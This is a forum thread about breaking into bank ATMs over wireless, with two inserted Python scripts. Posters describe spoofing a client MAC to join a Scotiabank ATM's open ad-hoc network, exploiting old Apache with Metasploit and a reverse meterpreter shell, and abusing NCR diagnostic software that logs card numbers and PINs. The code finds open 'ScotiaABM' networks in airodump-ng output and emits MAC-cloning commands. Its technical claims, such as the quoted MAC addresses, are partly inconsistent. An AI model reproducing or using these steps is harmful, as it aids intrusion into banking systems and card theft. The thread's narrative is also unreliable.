
Rooting ATMs :)


Trip


Well, ATMs are getting more and more insecure.

I worked at NCR briefly, and they just keep adding more and more stuff, such as wireless cards and Internet connections, DIRECT into the same machine that handles the money processing.

The software most ATMs run now is Windows (NT or XP) with no AV or firewall, and they run old versions of software.

I smell a recipe for disaster.


I haven't used ATMs for a very long time. I have a tendency to always use my banking card for purchasing goods; I know my bank may charge me transaction fees, but it's a lot safer that way.

If I need cash, I can always go to the bank and tell the teller I would like to withdraw some money, or go to the supermarket, buy something and then tell the checkout operator that I would like to take some cash out.


Guest Deleted_Account

Not sure if this is just my bank or if I am doing something wrong, but... I went to my local Scotia Bank and, thinking about WiFi on ATMs, I pulled out my old Pocket PC and ran a scan for any APs. Sure enough I found one labeled ScotiaABMXXXX (the X's are numbers; I'm guessing they are the location or ABM number). Anyway, after trying to connect (no encryption) it kicks me after a few seconds. Trying again with BT4, same thing. The connection type is ad-hoc and no encryption is set, but SOMETHING (maybe MAC filtering?) is kicking me as soon as I connect. Anyone know if this is how it's supposed to be? I was just messing around after hearing about it and all, but it doesn't let me connect.


I would guess MAC filtering, or maybe it just limits connections to the one PC that manages it. Did you try to see if any other computers were connected to that network?

MAC filtering won't be very effective, as it could be easily altered or faked. So anyone could pose as that legitimate machine and attack the system.

Limiting the number of connections and ensuring the system is fully hardened by a high-end firewall is one way of securing the system. The system shouldn't rely entirely on a single sign-on interface; there should be other means of authenticating, so that if an attacker manages to crack the first sign-on interface, he is presented with a more sophisticated or harder-to-break authentication system.

Edited by Infiltrator

Guest Deleted_Account

Well, sadly for the bank at least, it was MAC filtering. I scanned again today and there were 2 clients. I spoofed one of their MACs and was connected. And... guess what I find when I scan with nmap: Apache. So I run Metasploit (as it was exploitable and on a Win2000 machine). Now this is where things get weird: the ATM's MAC addy is 59-56-3B-8A-7B-F2 (no info when I did a lookup), but after connecting it seems I was "ported"? into a different machine, as the new addy matches the 2nd client, 03-00-E2-CF-77-4F (again no info). So somehow, after connecting to ScotiaABMXXXX with the fake MAC of client one (75-74-3C-CA-5E-51), I get sent to client 2 (running the BlackICE service and another unknown service on port 8942). I am guessing this is a honeypot but not sure. Also forgot to mention before, but Apache is there for the "login/upload" site for updating the machine, and as said by Infiltrator they need a more secure login, like protecting the ad-hoc system with WPA2 (AES) and keeping the login page; but instead they use MAC filtering and an old (exploitable) version of Apache on an OLD Windows 2000 machine. Anyway, I have yet to find a way back to the ATM after I get "sent" to the 2nd client (honeypot?).

Any ideas on how it's doing this?

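The MAC-filter bypass in the post above, and the airodump-ng step described later in the thread, come down to reading which stations are already associated with the target SSID and then borrowing one of their addresses. The script below is an added example, not code from anyone in this thread. The CSV dump it parses is constructed to mimic the file airodump-ng writes with `-w` (an AP table, a blank line, then a station table); the SSID, BSSIDs and station MACs in it are made up, and the `ip link` commands it emits assume a Linux host with iproute2. It also applies a check worth running on any MAC you intend to clone: a first octet with its low bit set is a group (multicast) address, which no station ever uses as a source address, so such an entry cannot be a real client. The three addresses quoted in the post above would all be flagged by it.

```python
import csv
import io

# Constructed airodump-ng CSV dump (made-up SSID, BSSIDs and MACs, not a real capture).
# Layout mimics airodump-ng's -w CSV output: leading blank line, access-point table,
# blank line, station table. The ad-hoc network's BSSID is locally administered (02:...).
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:1A:2B:3C:4D:5E, 2010-08-01 12:00:00, 2010-08-01 12:05:00,  6,  54, OPN , ,   ,  -40,      120,        0,   0.  0.  0.  0,  13, ScotiaABM1234, 
00:1B:2C:3D:4E:5F, 2010-08-01 12:00:01, 2010-08-01 12:05:00, 11,  54, WPA2, CCMP, PSK,  -60,       80,        0,   0.  0.  0.  0,   9, CoffeeNet, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:16:6F:AA:BB:01, 2010-08-01 12:00:10, 2010-08-01 12:04:00,  -50,       300, 02:1A:2B:3C:4D:5E, 
00:16:6F:AA:BB:02, 2010-08-01 12:01:10, 2010-08-01 12:04:30,  -55,        40, 02:1A:2B:3C:4D:5E, ScotiaABM1234
00:21:5C:00:00:03, 2010-08-01 12:02:00, 2010-08-01 12:03:00,  -70,        10, (not associated), CoffeeNet
"""


def parse_airodump_csv(text):
    """Split an airodump-ng CSV dump into AP and station records (whitespace stripped)."""
    aps, stations, section = [], [], None
    for row in csv.reader(io.StringIO(text)):
        row = [field.strip() for field in row]
        if not row or not row[0]:
            continue                         # blank separator lines
        if row[0] == "BSSID":
            section = "ap"
            continue
        if row[0] == "Station MAC":
            section = "station"
            continue
        if section == "ap" and len(row) >= 15:
            aps.append({"bssid": row[0], "channel": row[3], "privacy": row[5],
                        # ESSID may itself contain commas; Key is always the last field
                        "essid": ", ".join(row[13:-1])})
        elif section == "station" and len(row) >= 6:
            stations.append({"mac": row[0], "power": row[3], "bssid": row[5],
                             "probed": [p for p in row[6:] if p]})
    return aps, stations


def mac_flags(mac):
    """I/G and U/L bits of the first octet. Group addresses never appear as a station's
    source MAC, so a 'client' with the group bit set is not a real client."""
    first = int(mac.replace("-", ":").split(":")[0], 16)
    return {"group": bool(first & 0x01), "local": bool(first & 0x02)}


def find_open_networks(text, essid_prefix):
    """Open (OPN) networks whose ESSID starts with essid_prefix, each with the unicast
    station MACs airodump-ng saw associated to it: the candidates for cloning."""
    aps, stations = parse_airodump_csv(text)
    found = []
    for ap in aps:
        if not ap["essid"].startswith(essid_prefix) or ap["privacy"] != "OPN":
            continue
        clients = sorted(s["mac"] for s in stations
                         if s["bssid"] == ap["bssid"] and not mac_flags(s["mac"])["group"])
        found.append({"essid": ap["essid"], "bssid": ap["bssid"],
                      "channel": ap["channel"], "clients": clients})
    return found


def clone_mac_commands(iface, mac):
    """iproute2 commands that set iface's hardware address to mac (Linux, run as root).
    The interface has to be down while the address is changed."""
    return [f"ip link set dev {iface} down",
            f"ip link set dev {iface} address {mac.lower()}",
            f"ip link set dev {iface} up"]


if __name__ == "__main__":
    for net in find_open_networks(SAMPLE_CSV, "ScotiaABM"):
        print(net)
        if net["clients"]:
            print("\n".join(clone_mac_commands("wlan0", net["clients"][0])))
```

Cloning a client's MAC while that client is still active puts two stations with one address on the network and both will see disrupted traffic; the clean case is the real client being idle. Getting past the filter is also all that spoofing buys: it does nothing against whatever authentication sits on the services behind it.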

Found this ... http://www.mydigitallife.info/2006/09/25/a...aster-password/

and this ...

http://www.theregister.co.uk/2010/07/28/atm_hacking_demo/

To streamline his work, Jack developed an exploit kit he calls Dillinger, named after the 1930s bank robber. It can be used to access ATMs that are connected to the internet or the telephone system, which Jack said is true of most machines. The researcher has developed a rootkit dubbed Scrooge, which is installed once Dillinger has successfully penetrated a machine.

Apparently the vulnerability described in the videos above has been patched.

Edited by Trip

Another problem with ATMs (at least from NCR) is that they all come with the manufacturer's diagnostic software. This may seem harmless... but the diagnostic software has a utility to log card numbers and PINs, and not only that, it can periodically email this log. In the testing labs this functionality is very useful, but imagine if someone actually got into an ATM's software and set this up to email the numbers and PINs to themselves.



Exploitable, yeah? What Apache version are you using, and what exploit and payload did you use? Sorry for asking; I want to try it in my computer lab. By the way, did you have Apache running on a normal PC or a VM?


Guest Deleted_Account

First off I'll answer your questions: the Apache version is Apache 2.0.58 and I used the "mod_rewrite Remote Overflow Exploit (win2k3)" exploit. As for the payload, I used meterpreter reverse (I think... it's the one that connects right back to you). Any ideas on how/why I am being sent to client 2 after I connect to the meterpreter session? Am I doing something wrong?

Now secondly, as I know this is a legal gray zone, I would like to upload some packet captures, if that's okay. I will wait for confirmation before I do so.

NOTE: I do have permission to be running these tests, as it's my friend's ABM/ATM.



Hi X942,

The reason I asked was because I've just gotten into Metasploit and haven't been having much luck with exploiting my target VMs lately.

I think it may not be possible for me to exploit my targets, since they all seem to have the latest patches.

Now going back to your first question: do you have LHOST and RHOST set right? LHOST should be set to your attacker IP and RHOST to the target IP.

What errors are you receiving, if any? Are you able to get a reverse shell on the exploited machine?

Edited by Infiltrator

Guest Deleted_Account

Same here, I have never had much luck with VMs that are fully patched, besides maybe once or twice where I set up a malicious website (although my VM had to have Avast disabled since it detected it instantly; I didn't use any encoding on the payload that time). You may want to try the new version of S.E.T. (Social Engineering Toolkit), as it has some nice new features like USB/CD-ROM autorun exploits, more Java-based exploits and (if I remember right) USB HID (Rubber Ducky) use as well. To get the new version, just update from the existing one (0.3, I believe) in BT4 (I assume that's what you are using).

As for my problem, I am pretty sure, but will double check, that LHOST and RHOST are set right. Also, the only "error" I am getting is "Exploit failed: No encoders encoded the buffer successfully." However, the meterpreter shell still loads and I can connect (except to the "honeypot"/client 2). I am guessing that somehow either my attack is being forwarded to client 2, my shell/payload is being forwarded to client 2, I am doing something wrong, or Apache is really installed on client 2 and they are using port forwarding on port 80 of the ATM so it directs it to client 2.



I am not using BackTrack, I am using Metasploit Framework 3.4.2. I haven't had a chance to play with BackTrack yet. At one stage before, I was able to almost exploit my target, but the VM's AV blocked it.

I tried running the exploit again without any protection on the VM, but it failed. It said something about no session could be created. I then tried using encoders with the AV turned off, but that didn't work either. I have a feeling that my VM is fully patched and that could be why no exploits are working.

I am gonna keep trying until I can get a full penetration.


Guest Deleted_Account

I managed to get a meterpreter shell on my fully patched XP SP3 VM using Metasploit's latest DB update. Before trying again, do 2 things: 1) make sure the Metasploit DB is up to date and 2) if still no luck, re-install and try again. That's what I had to do before it would work again.

As for the ATM, I found out what was happening:

Scotia is using a system like this:

ATM (client 1)

HoneyPot (client 2)

Debug (client 3)

Now while scanning WiFi you see ScotiaBank-XXXX as the SSID. This is actually being broadcast by the ATM. Now here's where it gets tricky: when you connect to the SSID, first you have to pass through MAC address filtering (easy enough, as you see client 2 on the network with airodump-ng). Next you can do one of 2 things:

1) Connect to 10.0.0.104:8753 and be prompted with an SSL-encrypted "Debug" page with upgrade and other options (passworded).

OR

2) Port scan and see an exploitable version of Apache running on port 80.

Now it seems that after connecting to the SSID you are tunneled through to client 2 (as port scans hit this and client 3 only), so the exploited Apache gets nowhere, as it is a honeypot of sorts. However, if you can exploit client 3 you could upload a malicious payload!

The debug client is apparently running Linux with Apache on 8753 (not exploitable). I did try to trick it into thinking I was the debug client and send some commands, but no go. Must be some kind of handshake or hash check before it allows you to do so.

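The mechanism proposed in the last two posts (port 80 on the host that broadcasts the SSID is forwarded to client 2, so the exploit and the session it spawns land on the decoy rather than the ATM) can be reproduced on one machine. The script below is an added example, not code from this thread or from any bank system: a decoy listener answers with a constructed Apache-style banner, a one-shot TCP forwarder stands in for the ATM-side port 80, and an "attacker" connects to the forwarder. All addresses are loopback with ephemeral ports; nothing about the real network is assumed beyond the forwarding itself. The values it returns show the two facts a tester would want to confirm: the attacker only ever addressed the forwarder, yet the bytes came from the decoy, and the decoy's view of its peer is the forwarder, not the attacker.

```python
import socket
import threading

# Constructed banner standing in for whatever the decoy web server would really send.
DECOY_BANNER = (b"HTTP/1.0 200 OK\r\n"
                b"Server: Apache/2.0.58 (Win32)\r\n"
                b"X-Answered-By: decoy-host\r\n\r\n")


def _listener():
    """Loopback TCP listener on an ephemeral port."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    s.listen(1)
    return s


def serve_decoy(listener, result):
    """Client 2, the decoy: answer one connection with the banner and record who
    connected. The peer it sees is the forwarder, never the attacker."""
    conn, peer = listener.accept()
    with conn:
        conn.recv(4096)                      # the request, which the decoy ignores
        conn.sendall(DECOY_BANNER)
    result["decoy_peer"] = peer


def _pump(src, dst):
    """Relay bytes src -> dst until EOF, then pass the EOF on as a half-close."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def forward_once(listener, target, result):
    """Client 1, the host that owns the SSID: accept one client on its own 'port 80'
    and relay it to target. Every byte the attacker gets back originates on the decoy."""
    client, _ = listener.accept()
    upstream = socket.create_connection(target)
    result["forwarder_upstream_port"] = upstream.getsockname()[1]
    pumps = [threading.Thread(target=_pump, args=(client, upstream), daemon=True),
             threading.Thread(target=_pump, args=(upstream, client), daemon=True)]
    for t in pumps:
        t.start()
    for t in pumps:
        t.join()
    client.close()
    upstream.close()


def run_demo():
    """Wire decoy and forwarder together, connect as the attacker, return what each side saw."""
    result = {}
    decoy_l, fwd_l = _listener(), _listener()
    threads = [threading.Thread(target=serve_decoy, args=(decoy_l, result), daemon=True),
               threading.Thread(target=forward_once,
                                args=(fwd_l, decoy_l.getsockname(), result), daemon=True)]
    for t in threads:
        t.start()

    attacker = socket.create_connection(fwd_l.getsockname())   # "scanning the ATM"
    attacker.settimeout(5)
    result["attacker_local_port"] = attacker.getsockname()[1]
    result["target_as_seen_by_attacker"] = fwd_l.getsockname()
    attacker.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
    chunks = []
    while True:
        data = attacker.recv(4096)
        if not data:
            break
        chunks.append(data)
    attacker.close()
    for t in threads:
        t.join(5)
    decoy_l.close()
    fwd_l.close()
    result["banner"] = b"".join(chunks)
    return result


if __name__ == "__main__":
    seen = run_demo()
    print("attacker connected to:", seen["target_as_seen_by_attacker"])
    print("banner came back from the decoy:", seen["banner"].split(b"\r\n")[1:3])
    print("decoy's idea of who connected:", seen["decoy_peer"])
```

The practical consequence for the exploit in the thread is that nothing in the HTTP exchange distinguishes a forwarded port from a local one; the host you nmap and the host whose Apache you overflow are simply different machines. A reverse payload executes on the decoy, so whatever address the resulting session reports is the decoy's, which is the kind of mismatch X942 describes seeing after connecting.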
